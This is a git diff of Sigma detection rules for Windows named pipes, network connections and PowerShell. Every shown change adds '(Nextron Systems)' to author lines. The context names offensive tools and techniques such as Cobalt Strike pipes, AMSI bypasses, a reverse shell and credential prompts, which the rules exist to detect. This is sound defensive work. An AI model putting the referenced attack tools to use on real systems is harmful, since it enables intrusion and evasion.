attack.defense_evasion diff --git a/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml b/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml index 1c7822845..64f9a0536 100644 --- a/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml +++ b/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml @@ -5,7 +5,7 @@ description: Detects an executable that isn't dropbox but communicates with the references: - https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb - https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/04/20 logsource: category: network_connection diff --git a/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml b/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml index 06c238c9f..ad2f8d984 100755 --- a/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml +++ b/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml @@ -4,7 +4,7 @@ status: test description: Detects programs with network connections running in suspicious files system locations references: - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo -author: Florian Roth, Tim Shelton +author: Florian Roth (Nextron Systems), Tim Shelton date: 2017/03/19 modified: 2022/05/26 tags: diff --git a/rules/windows/pipe_created/pipe_created_diagtrack_eop_default_pipe.yml b/rules/windows/pipe_created/pipe_created_diagtrack_eop_default_pipe.yml index 31b2a0ff1..3ae653567 100644 --- a/rules/windows/pipe_created/pipe_created_diagtrack_eop_default_pipe.yml +++ b/rules/windows/pipe_created/pipe_created_diagtrack_eop_default_pipe.yml @@ -4,7 +4,7 @@ status: experimental description: Detects creation of default named pipe used by the DiagTrackEoP POC references: - https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/03 tags: - attack.privilege_escalation diff --git a/rules/windows/pipe_created/pipe_created_efspotato_namedpipe.yml b/rules/windows/pipe_created/pipe_created_efspotato_namedpipe.yml index 7c3987afc..957e4104f 100644 --- a/rules/windows/pipe_created/pipe_created_efspotato_namedpipe.yml +++ b/rules/windows/pipe_created/pipe_created_efspotato_namedpipe.yml @@ -5,7 +5,7 @@ description: Detects the pattern of a pipe name as used by the tool EfsPotato references: - https://twitter.com/SBousseaden/status/1429530155291193354?s=20 - https://github.com/zcgonvh/EfsPotato -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/08/23 modified: 2022/06/20 tags: diff --git a/rules/windows/pipe_created/pipe_created_koh_default_pipe.yml b/rules/windows/pipe_created/pipe_created_koh_default_pipe.yml index 7a853237e..6a9e10ab4 100644 --- a/rules/windows/pipe_created/pipe_created_koh_default_pipe.yml +++ b/rules/windows/pipe_created/pipe_created_koh_default_pipe.yml @@ -4,7 +4,7 @@ status: experimental description: Detects creation of default named pipes used by the Koh tool references: - https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/08 tags: - attack.privilege_escalation diff --git a/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml b/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml index cb0236bb6..9ca006e3f 100644 --- a/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml +++ b/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml @@ -8,7 +8,7 @@ references: - https://github.com/SigmaHQ/sigma/issues/253 - https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/ - https://redcanary.com/threat-detection-report/threats/cobalt-strike/ -author: Florian Roth, Wojciech Lesicki +author: Florian Roth (Nextron Systems), Wojciech Lesicki date: 2021/05/25 modified: 2022/10/31 tags: diff --git a/rules/windows/pipe_created/pipe_created_mal_cobaltstrike_re.yml b/rules/windows/pipe_created/pipe_created_mal_cobaltstrike_re.yml index 235a22de4..040265dd5 100644 --- a/rules/windows/pipe_created/pipe_created_mal_cobaltstrike_re.yml +++ b/rules/windows/pipe_created/pipe_created_mal_cobaltstrike_re.yml @@ -5,7 +5,7 @@ description: Detects the creation of a named pipe matching a pattern used by Cob references: - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/07/30 modified: 2022/12/31 tags: diff --git a/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml b/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml index 473d6cacb..9a4913de4 100644 --- a/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml +++ b/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml @@ -15,7 +15,7 @@ references: - https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf - https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/ - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ -author: Florian Roth, blueteam0ps, elhoim +author: Florian Roth (Nextron Systems), blueteam0ps, elhoim date: 2017/11/06 modified: 2022/03/15 tags: diff --git a/rules/windows/pipe_created/pipe_created_paexec_default_pipe.yml b/rules/windows/pipe_created/pipe_created_paexec_default_pipe.yml index afd3675e3..ff6f55783 100644 --- a/rules/windows/pipe_created/pipe_created_paexec_default_pipe.yml +++ b/rules/windows/pipe_created/pipe_created_paexec_default_pipe.yml @@ -4,7 +4,7 @@ status: test description: Detects PAExec default named pipe references: - https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Command%20and%20Control/C2-NamedPipe.md -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/26 tags: - attack.execution diff --git a/rules/windows/pipe_created/pipe_created_psexec_default_pipe_from_susp_location.yml b/rules/windows/pipe_created/pipe_created_psexec_default_pipe_from_susp_location.yml index ad29185eb..41fa2e118 100644 --- a/rules/windows/pipe_created/pipe_created_psexec_default_pipe_from_susp_location.yml +++ b/rules/windows/pipe_created/pipe_created_psexec_default_pipe_from_susp_location.yml @@ -8,7 +8,7 @@ description: Detects PsExec default pipe creation where the image executed is lo references: - https://www.jpcert.or.jp/english/pub/sr/ir_research.html - https://jpcertcc.github.io/ToolAnalysisResultSheet -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/04 tags: - attack.execution diff --git a/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml index 0fa98a2af..f9760d37f 100644 --- a/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml +++ b/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml @@ -5,7 +5,7 @@ description: Detects the creation of a named pipe with a pattern found in Cobalt references: - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752 -author: Florian Roth, Christian Burkard +author: Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems) date: 2021/07/30 modified: 2022/10/09 tags: diff --git a/rules/windows/pipe_created/pipe_created_susp_wmi_consumer_namedpipe.yml b/rules/windows/pipe_created/pipe_created_susp_wmi_consumer_namedpipe.yml index c868b66b4..54dd2ff2b 100644 --- a/rules/windows/pipe_created/pipe_created_susp_wmi_consumer_namedpipe.yml +++ b/rules/windows/pipe_created/pipe_created_susp_wmi_consumer_namedpipe.yml @@ -4,7 +4,7 @@ status: test description: Detects the WMI Event Consumer service scrcons.exe creating a named pipe references: - https://github.com/RiccardoAncarani/LiquidSnake -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/09/01 modified: 2022/10/09 tags: diff --git a/rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml b/rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml index 8c46b03d4..9a4b6d6e4 100644 --- a/rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml +++ b/rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml @@ -4,7 +4,7 @@ status: experimental description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0 references: - http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/ -author: Florian Roth (rule), Lee Holmes (idea), Harish Segar (improvements) +author: Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements) date: 2017/03/22 modified: 2022/12/02 tags: diff --git a/rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml b/rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml index a1c1dffa6..65ff383ae 100644 --- a/rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml +++ b/rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml @@ -4,7 +4,7 @@ status: test description: Detects PowerShell called from an executable by the version mismatch method references: - https://adsecurity.org/?p=2921 -author: Sean Metcalf (source), Florian Roth (rule) +author: Sean Metcalf (source), Florian Roth (Nextron Systems) date: 2017/03/05 modified: 2022/12/25 tags: diff --git a/rules/windows/powershell/powershell_classic/posh_pc_susp_download.yml b/rules/windows/powershell/powershell_classic/posh_pc_susp_download.yml index 99423a91e..87eb56ab1 100644 --- a/rules/windows/powershell/powershell_classic/posh_pc_susp_download.yml +++ b/rules/windows/powershell/powershell_classic/posh_pc_susp_download.yml @@ -7,7 +7,7 @@ status: experimental description: Detects suspicious PowerShell download command references: - https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/03/05 modified: 2022/11/09 tags: diff --git a/rules/windows/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml b/rules/windows/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml index c420b1ccc..397c248ed 100644 --- a/rules/windows/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml +++ b/rules/windows/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml @@ -11,7 +11,7 @@ references: - https://github.com/samratashok/ADModule - https://twitter.com/cyb3rops/status/1617108657166061568?s=20 - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges -author: Nasreddine Bencherchali, frack113 +author: Nasreddine Bencherchali (Nextron Systems), frack113 date: 2023/01/22 tags: - attack.reconnaissance diff --git a/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml b/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml index a3746dd18..c80caf91b 100644 --- a/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml +++ b/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml @@ -5,7 +5,7 @@ description: Detects suspicious invocation of the Get-ADDBAccount script that re references: - https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/ - https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/03/16 tags: - attack.credential_access diff --git a/rules/windows/powershell/powershell_module/posh_pm_malicious_commandlets.yml b/rules/windows/powershell/powershell_module/posh_pm_malicious_commandlets.yml index 0db925a1e..662d85a63 100644 --- a/rules/windows/powershell/powershell_module/posh_pm_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_module/posh_pm_malicious_commandlets.yml @@ -23,7 +23,7 @@ references: - https://github.com/samratashok/nishang - https://github.com/DarkCoderSc/PowerRunAsSystem/ - https://github.com/besimorhino/powercat -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/20 modified: 2023/01/23 tags: diff --git a/rules/windows/powershell/powershell_module/posh_pm_susp_download.yml b/rules/windows/powershell/powershell_module/posh_pm_susp_download.yml index b8f55c2b5..952569b11 100644 --- a/rules/windows/powershell/powershell_module/posh_pm_susp_download.yml +++ b/rules/windows/powershell/powershell_module/posh_pm_susp_download.yml @@ -5,7 +5,7 @@ related: type: derived status: experimental description: Detects suspicious PowerShell download command -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/03/05 modified: 2023/01/20 tags: diff --git a/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml b/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml index 6e2d3bb30..794abcad8 100644 --- a/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml +++ b/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml @@ -7,7 +7,7 @@ related: type: similar status: experimental description: Detects suspicious PowerShell invocation command parameters -author: Florian Roth (rule) +author: Florian Roth (Nextron Systems) date: 2017/03/12 modified: 2023/01/03 tags: diff --git a/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml b/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml index cbd449cb0..bdb8500e4 100644 --- a/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml +++ b/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml @@ -9,7 +9,7 @@ related: type: similar status: experimental description: Detects suspicious PowerShell invocation command parameters -author: Florian Roth (rule), Jonhnathan Ribeiro +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro date: 2017/03/05 modified: 2023/01/05 tags: diff --git a/rules/windows/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml b/rules/windows/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml index c922fce07..00ab2ef73 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml @@ -8,7 +8,7 @@ description: Detects ADDInternals Cmdlet execution. A tool for administering Azu references: - https://o365blog.com/aadinternals/ - https://github.com/Gerenios/AADInternals -author: Austin Songer (@austinsonger), Nasreddine Bencherchali (update) +author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems) date: 2022/12/23 tags: - attack.execution diff --git a/rules/windows/powershell/powershell_script/posh_ps_add_windows_capability.yml b/rules/windows/powershell/powershell_script/posh_ps_add_windows_capability.yml index ed9ee9b54..972d96ce4 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_add_windows_capability.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_add_windows_capability.yml @@ -8,7 +8,7 @@ description: Detects usage of the "Add-WindowsCapability" cmdlet to add new wind references: - https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell - https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/22 tags: - attack.execution diff --git a/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml b/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml index 744061a8e..79d02c5f2 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml @@ -5,7 +5,7 @@ description: Detects code fragments found in small and obfuscated AMSI bypass Po references: - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ - https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/11/09 tags: - attack.defense_evasion diff --git a/rules/windows/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml b/rules/windows/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml index fa229d87a..ab873afa4 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml @@ -7,7 +7,7 @@ status: experimental description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities references: - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/04 tags: - attack.defense_evasion diff --git a/rules/windows/powershell/powershell_script/posh_ps_audio_exfiltration.yml b/rules/windows/powershell/powershell_script/posh_ps_audio_exfiltration.yml index be3c5d3bb..987d0f8e9 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_audio_exfiltration.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_audio_exfiltration.yml @@ -4,7 +4,7 @@ status: experimental description: Detects potential exfiltration attempt via audio file using PowerShell references: - https://github.com/gtworek/PSBits/blob/e97cbbb173b31cbc4d37244d3412de0a114dacfb/NoDLP/bin2wav.ps1 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/16 tags: - attack.exfiltration diff --git a/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml b/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml index 4f015b275..569b7a97d 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml @@ -9,7 +9,7 @@ references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ - https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/11/17 tags: - attack.discovery diff --git a/rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml b/rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml index e95b2ac3e..212142707 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml @@ -7,7 +7,7 @@ status: experimental description: Detects usage of powershell cmdlets to disable or remove ETW trace sessions references: - https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/28 modified: 2022/11/25 tags: diff --git a/rules/windows/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml b/rules/windows/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml index 2a849fd21..4a67c80cf 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml @@ -4,7 +4,7 @@ status: experimental description: Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule. references: - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/26 tags: - attack.exfiltration diff --git a/rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml b/rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml index 07ac82232..575987e23 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml @@ -4,7 +4,7 @@ status: experimental description: Detects call to "Win32_QuickFixEngineering" in order to enumerate installed hotfixes often used in "enum" scripts by attackers references: - https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/21 tags: - attack.discovery diff --git a/rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml b/rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml index 12b4ea3eb..8bd15a134 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml @@ -7,7 +7,7 @@ status: experimental description: Detects powershell scripts that import modules from suspicious directories references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/07 modified: 2023/01/10 tags: diff --git a/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml b/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml index ab2894205..c99b16071 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml @@ -10,7 +10,7 @@ references: - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/26 tags: - attack.exfiltration diff --git a/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml index b9324752b..d10f2c78a 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml @@ -27,7 +27,7 @@ references: - https://github.com/samratashok/nishang - https://github.com/DarkCoderSc/PowerRunAsSystem/ - https://github.com/besimorhino/powercat -author: Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer +author: Sean Metcalf, Florian Roth (Nextron Systems), Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali (Nextron Systems), Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems), Austin Songer date: 2017/03/05 modified: 2023/01/23 tags: diff --git a/rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml b/rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml index baa89ee45..9a1326c6e 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml @@ -4,7 +4,7 @@ status: test description: Detects keywords from well-known PowerShell exploitation frameworks references: - https://adsecurity.org/?p=2921 -author: Sean Metcalf (source), Florian Roth (rule) +author: Sean Metcalf (source), Florian Roth (Nextron Systems) date: 2017/03/05 modified: 2022/12/25 tags: diff --git a/rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml b/rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml index 9c2fdf12d..eb61b9663 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml @@ -4,7 +4,7 @@ status: test description: Detects usage of a PowerShell command to dump the live memory of a Windows machine references: - https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo -author: Max Altgelt +author: Max Altgelt (Nextron Systems) date: 2021/09/21 modified: 2022/12/25 tags: diff --git a/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml b/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml index d03f82f61..b8aa7b598 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml @@ -5,7 +5,7 @@ description: Detects PowerShell calling a credential prompt references: - https://twitter.com/JohnLaTwC/status/850381440629981184 - https://t.co/ezOTGy1a1G -author: John Lambert (idea), Florian Roth (rule) +author: John Lambert (idea), Florian Roth (Nextron Systems) date: 2017/04/09 modified: 2022/12/25 tags: diff --git a/rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml b/rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml index 95b10125e..8c3e71d67 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell references: - https://github.com/JoelGMSec/PSAsyncShell -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/04 tags: - attack.execution diff --git a/rules/windows/powershell/powershell_script/posh_ps_psattack.yml b/rules/windows/powershell/powershell_script/posh_ps_psattack.yml index 927e769d9..d7d673c6b 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_psattack.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_psattack.yml @@ -4,7 +4,7 @@ status: test description: Detects the use of PSAttack PowerShell hack tool references: - https://adsecurity.org/?p=2921 -author: Sean Metcalf (source), Florian Roth (rule) +author: Sean Metcalf (source), Florian Roth (Nextron Systems) date: 2017/03/05 modified: 2022/12/25 tags: diff --git a/rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml b/rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml index 77c40abbb..91f9e597e 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml @@ -4,7 +4,7 @@ status: test description: Detects Base64 encoded Shellcode references: - https://twitter.com/cyb3rops/status/1063072865992523776 -author: David Ledbetter (shellcode), Florian Roth (rule) +author: David Ledbetter (shellcode), Florian Roth (Nextron Systems) date: 2018/11/17 modified: 2022/12/25 tags: diff --git a/rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml index fd3eb2972..373c4db15 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml @@ -4,7 +4,7 @@ status: test description: Detects Commandlet names from ShellIntel exploitation scripts. references: - https://github.com/Shellntel/scripts/ -author: Max Altgelt, Tobias Michalski +author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) date: 2021/08/09 modified: 2023/01/02 tags: diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_ace_tampering.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_ace_tampering.yml index 4e660deeb..4488e2ae1 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_susp_ace_tampering.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_susp_ace_tampering.yml @@ -4,7 +4,7 @@ status: experimental description: Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project. references: - https://github.com/HarmJ0y/DAMP -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/05 tags: - attack.persistence diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml index adc258a79..1203f0ab5 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml @@ -7,7 +7,7 @@ status: experimental description: Detects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation references: - Internal Research -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/09 tags: - attack.defense_evasion diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml index 97238f5d8..03a17f1d4 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml @@ -9,7 +9,7 @@ references: - https://twitter.com/oroneequalsone/status/1568432028361830402 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/12 tags: - attack.defense_evasion diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_download.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_download.yml index bea931133..1c6a1956b 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_susp_download.yml +++ 